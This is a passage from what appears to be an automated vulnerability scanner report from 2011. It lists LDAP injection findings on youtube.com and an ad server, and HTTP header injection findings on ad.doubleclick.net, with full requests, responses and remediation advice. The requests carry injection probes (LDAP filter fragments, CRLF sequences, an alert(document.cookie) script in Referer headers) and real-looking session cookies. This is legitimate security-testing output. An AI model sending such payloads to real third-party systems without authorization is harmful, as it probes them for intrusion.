The payloads da39f516a098b3de)(sn=* and da39f516a098b3de)!(sn=* were each submitted in the pid parameter. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /bmx3/broker.pli?pid=da39f516a098b3de)(sn=*&PRAd=264255445&AR_C=185637072 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response 1

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:00 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_da39f516a098b3de&#41;&#40;sn=exp=1&initExp=Sun Feb 6 13:40:00 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:00 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296999600; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

Request 2

GET /bmx3/broker.pli?pid=da39f516a098b3de)!(sn=*&PRAd=264255445&AR_C=185637072 HTTP/1.1
Host: ar.voicefive.com
Proxy-Connection: keep-alive
Referer: http://redacted/MRT/iview/264255445/direct;wi.300;hi.250/01/1354764918?click=http://adclick.g.doubleclick.net/aclk%3Fsa%3DL%26ai%3DBcyT_rqROTdLmI6iAlgf8zqmDD8WH7_4Bldn30BfAjbcB4JPpARABGAEg0OXxAjgAYMmGo4fUo4AQsgEIdGlwZC5jb226AQozMDB4MjUwX2FzyAEJ2gEYaHR0cDovL3RpcGQuY29tL3JlZ2lzdGVy4AEDuAIYyAKt1cMb4AIA6gIcdGlwZC1PdGhlcnMyX3NpZGViYXJfMzAweDI1MJAD6AKYA-gCqAMB0QNO9fRQWewlKugDhwfoA2voA-AC6APrBPUDAAIAxOAEAQ%26num%3D1%26sig%3DAGiWqtxTgjZHpd2on74ev1YZd4H94e6BEA%26client%3Dca-pub-7786708287155161%26adurl%3D
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ar_p67161473=exp=1&initExp=Sat Jan 8 03:20:09 2011&recExp=Sat Jan 8 03:20:09 2011&prad=55352400&cpn=4&arc=38899481&; ar_p83612734=exp=1&initExp=Fri Jan 28 22:52:05 2011&recExp=Fri Jan 28 22:52:05 2011&prad=57555319&arc=39967551&; ar_p45555483=exp=1&initExp=Sat Jan 29 01:32:02 2011&recExp=Sat Jan 29 01:32:02 2011&prad=59007464&arc=38601779&; ar_p68511049=exp=5&initExp=Mon Jan 31 16:31:23 2011&recExp=Mon Jan 31 17:13:10 2011&prad=264243128&arc=186035359&; ar_p85001580=exp=43&initExp=Wed Jan 26 20:14:29 2011&recExp=Sat Feb 5 15:06:35 2011&prad=58087444&arc=40401508&; UID=1d29d89e-72.246.30.75-1294456810

Response 2

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 06 Feb 2011 13:40:00 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_da39f516a098b3de&#41;!&#40;sn=exp=1&initExp=Sun Feb 6 13:40:00 2011&recExp=Sun Feb 6 13:40:00 2011&prad=264255445&arc=185637072&; expires=Sat 07-May-2011 13:40:00 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_G=method->-1,ts->1296999600; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 9

/*error*/

2.2. http://www.youtube.com/v/VUCJyeb_3Mo [VISITOR_INFO1_LIVE cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /v/VUCJyeb_3Mo

Issue detail

The VISITOR_INFO1_LIVE cookie appears to be vulnerable to LDAP injection attacks.

The payloads *)(sn=* and *)!(sn=* were each submitted in the VISITOR_INFO1_LIVE cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a conjunctive LDAP query in an unsafe manner.

Request 1

GET /v/VUCJyeb_3Mo?fs=1&hl=en_US&color1=0x3a3a3a&color2=0x999999 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.owneriq.com/manuals-online?4a4b1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E18871e2d338=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=*)(sn=*; use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; GEO=c0f1d1d2c857cb01c350c8b8c68c361ecwsAAAAzVVOtwdbzTU3HFg==

Response 1

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:06 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=puf24BL7mrY; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:03:06 GMT
Set-Cookie: VISITOR_INFO1_LIVE=puf24BL7mrY; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:03:06 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1151
Content-Type: application/x-shockwave-flash


Request 2

GET /v/VUCJyeb_3Mo?fs=1&hl=en_US&color1=0x3a3a3a&color2=0x999999 HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.owneriq.com/manuals-online?4a4b1%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E18871e2d338=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=*)!(sn=*; use_hitbox=72c46ff6cbcdb7c5585c36411b6b334edAEAAAAw; GEO=c0f1d1d2c857cb01c350c8b8c68c361ecwsAAAAzVVOtwdbzTU3HFg==

Response 2

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:03:07 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=te6UVu5KjtQ; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:03:07 GMT
Set-Cookie: VISITOR_INFO1_LIVE=te6UVu5KjtQ; path=/; domain=.youtube.com; expires=Mon, 03-Oct-2011 23:03:07 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1161
Content-Type: application/x-shockwave-flash


2.3. http://www.youtube.com/v/sj4BVK0o-7w [VISITOR_INFO1_LIVE cookie]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.youtube.com
Path:   /v/sj4BVK0o-7w

Issue detail

The VISITOR_INFO1_LIVE cookie appears to be vulnerable to LDAP injection attacks.

The payloads 4e65bf9585ccb14d)(sn=* and 4e65bf9585ccb14d)!(sn=* were each submitted in the VISITOR_INFO1_LIVE cookie. These two requests resulted in different responses, indicating that the input may be incorporated into a disjunctive LDAP query in an unsafe manner.

Request 1

GET /v/sj4BVK0o-7w HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=4e65bf9585ccb14d)(sn=*

Response 1

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:45:30 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=JDxEeiRoNDo; path=/; domain=.youtube.com; expires=Tue, 04-Oct-2011 17:45:30 GMT
Set-Cookie: VISITOR_INFO1_LIVE=JDxEeiRoNDo; path=/; domain=.youtube.com; expires=Tue, 04-Oct-2011 17:45:30 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1028
Content-Type: application/x-shockwave-flash


Request 2

GET /v/sj4BVK0o-7w HTTP/1.1
Host: www.youtube.com
Proxy-Connection: keep-alive
Referer: http://www.mittelstandsblog.de/?d18cb%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E02e0a7e96b=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VISITOR_INFO1_LIVE=4e65bf9585ccb14d)!(sn=*

Response 2

HTTP/1.1 200 OK
Date: Sun, 06 Feb 2011 17:45:31 GMT
Server: Apache
X-Content-Type-Options: nosniff
Set-Cookie: VISITOR_INFO1_LIVE=Rv5nYsXJ1-I; path=/; domain=.youtube.com; expires=Tue, 04-Oct-2011 17:45:31 GMT
Set-Cookie: VISITOR_INFO1_LIVE=Rv5nYsXJ1-I; path=/; domain=.youtube.com; expires=Tue, 04-Oct-2011 17:45:31 GMT
Expires: Tue, 27 Apr 1971 19:44:06 EST
Cache-Control: no-cache
Content-Length: 1042
Content-Type: application/x-shockwave-flash


3. HTTP header injection
There are 29 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.


3.1. http://ad.doubleclick.net/ad/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N553.158901.DATAXU/B4970757.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 9bf0b%0d%0ad1d5184d06f was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /9bf0b%0d%0ad1d5184d06f/N553.158901.DATAXU/B4970757.11 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc;

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/9bf0b
d1d5184d06f
/N553.158901.DATAXU/B4970757.11:
Date: Sat, 05 Feb 2011 21:50:27 GMT
Server: GFE/2.0
Connection: close

<h1>Error 302 Moved Temporarily</h1>

3.2. http://ad.doubleclick.net/ad/N815.286991.WEBBUYERSGUIDE/B5173264 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.286991.WEBBUYERSGUIDE/B5173264

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 843f5%0d%0acb11c15fe77 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /843f5%0d%0acb11c15fe77/N815.286991.WEBBUYERSGUIDE/B5173264;sz=1x1;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/843f5
cb11c15fe77
/N815.286991.WEBBUYERSGUIDE/B5173264%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D:
Date: Sun, 06 Feb 2011 13:22:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.3. http://ad.doubleclick.net/ad/N815.zdenterprise/B4597436.59 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.zdenterprise/B4597436.59

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 1032c%0d%0a72456777471 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /1032c%0d%0a72456777471/N815.zdenterprise/B4597436.59;sz=1x1;ord=1288981822554? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/1032c
72456777471
/N815.zdenterprise/B4597436.59%3Bsz%3D1x1%3Bord%3D1288981822554:
Date: Sun, 06 Feb 2011 13:22:40 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.4. http://ad.doubleclick.net/ad/N815.zdenterprise/B4822628.25 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.zdenterprise/B4822628.25

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 8b0ee%0d%0a76dcc98cc56 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /8b0ee%0d%0a76dcc98cc56/N815.zdenterprise/B4822628.25;sz=1x1;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/8b0ee
76dcc98cc56
/N815.zdenterprise/B4822628.25%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D:
Date: Sun, 06 Feb 2011 13:22:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.5. http://ad.doubleclick.net/ad/N815.zdenterprise/B5069510.14 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.zdenterprise/B5069510.14

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5dc39%0d%0a0f8fde46ef2 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5dc39%0d%0a0f8fde46ef2/N815.zdenterprise/B5069510.14;sz=1x1;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5dc39
0f8fde46ef2
/N815.zdenterprise/B5069510.14%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D:
Date: Sun, 06 Feb 2011 13:22:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.6. http://ad.doubleclick.net/ad/N815.zdenterprise/B5069510.30 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.zdenterprise/B5069510.30

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 5ecae%0d%0aaf16c007475 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /5ecae%0d%0aaf16c007475/N815.zdenterprise/B5069510.30;sz=1x1;ord=%n? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/5ecae
af16c007475
/N815.zdenterprise/B5069510.30%3Bsz%3D1x1%3Bord%3D%25n:
Date: Sun, 06 Feb 2011 13:22:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.7. http://ad.doubleclick.net/ad/N815.zdenterprise/B5069510.9 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/N815.zdenterprise/B5069510.9

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2f022%0d%0a00140ddecd3 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2f022%0d%0a00140ddecd3/N815.zdenterprise/B5069510.9;sz=1x1;ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2f022
00140ddecd3
/N815.zdenterprise/B5069510.9%3Bsz%3D1x1%3Bord%3D%5Btimestamp%5D:
Date: Sun, 06 Feb 2011 13:22:38 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.8. http://ad.doubleclick.net/ad/entzd.eweek/ibmtutorial [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/entzd.eweek/ibmtutorial

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 36cf6%0d%0a6a7c8a5efd6 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /36cf6%0d%0a6a7c8a5efd6/entzd.eweek/ibmtutorial;sz=1x1;ord=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/36cf6
6a7c8a5efd6
/entzd.eweek/ibmtutorial%3Bsz%3D1x1%3Bord%3D1:
Date: Sun, 06 Feb 2011 13:22:39 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.9. http://ad.doubleclick.net/ad/entzd.eweek/ibmwidget/cloudimu [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/entzd.eweek/ibmwidget/cloudimu

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 17ca4%0d%0a41f12a81071 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /17ca4%0d%0a41f12a81071/entzd.eweek/ibmwidget/cloudimu;sz=1x1;ord=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/17ca4
41f12a81071
/entzd.eweek/ibmwidget/cloudimu%3Bsz%3D1x1%3Bord%3D1:
Date: Sun, 06 Feb 2011 13:22:41 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.10. http://ad.doubleclick.net/ad/entzd.eweek/ibmwidget/virtimu [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /ad/entzd.eweek/ibmwidget/virtimu

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 22974%0d%0a6a1f47d2342 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /22974%0d%0a6a1f47d2342/entzd.eweek/ibmwidget/virtimu;sz=1x1;ord=1 HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://www.baselinemag.com/c/a/IT-Management/Macys-Ramps-Up-Online-Operations-637464/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=c653243310000d9|189445/973580/15010,2818894/957634/15009,2409535/850532/15008,1352495/437351/15008|t=1294099968|et=730|cs=gfdmbifc

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/22974
6a1f47d2342
/entzd.eweek/ibmwidget/virtimu%3Bsz%3D1x1%3Bord%3D1:
Date: Sun, 06 Feb 2011 13:22:40 GMT
Server: GFE/2.0

<h1>Error 302 Moved Temporarily</h1>

3.11. http://ad.doubleclick.net/adi/N553.158901.DATAXU/B4970757.11 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N553.158901.DATAXU/B4970757.11

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 14c2c%0d%0ab2351d233db was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /14c2c%0d%0ab2351d233db/N553.158901.DATAXU/B4970757.11;sz=468x60;pc=[TPAS_ID];ord=[timestamp]? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
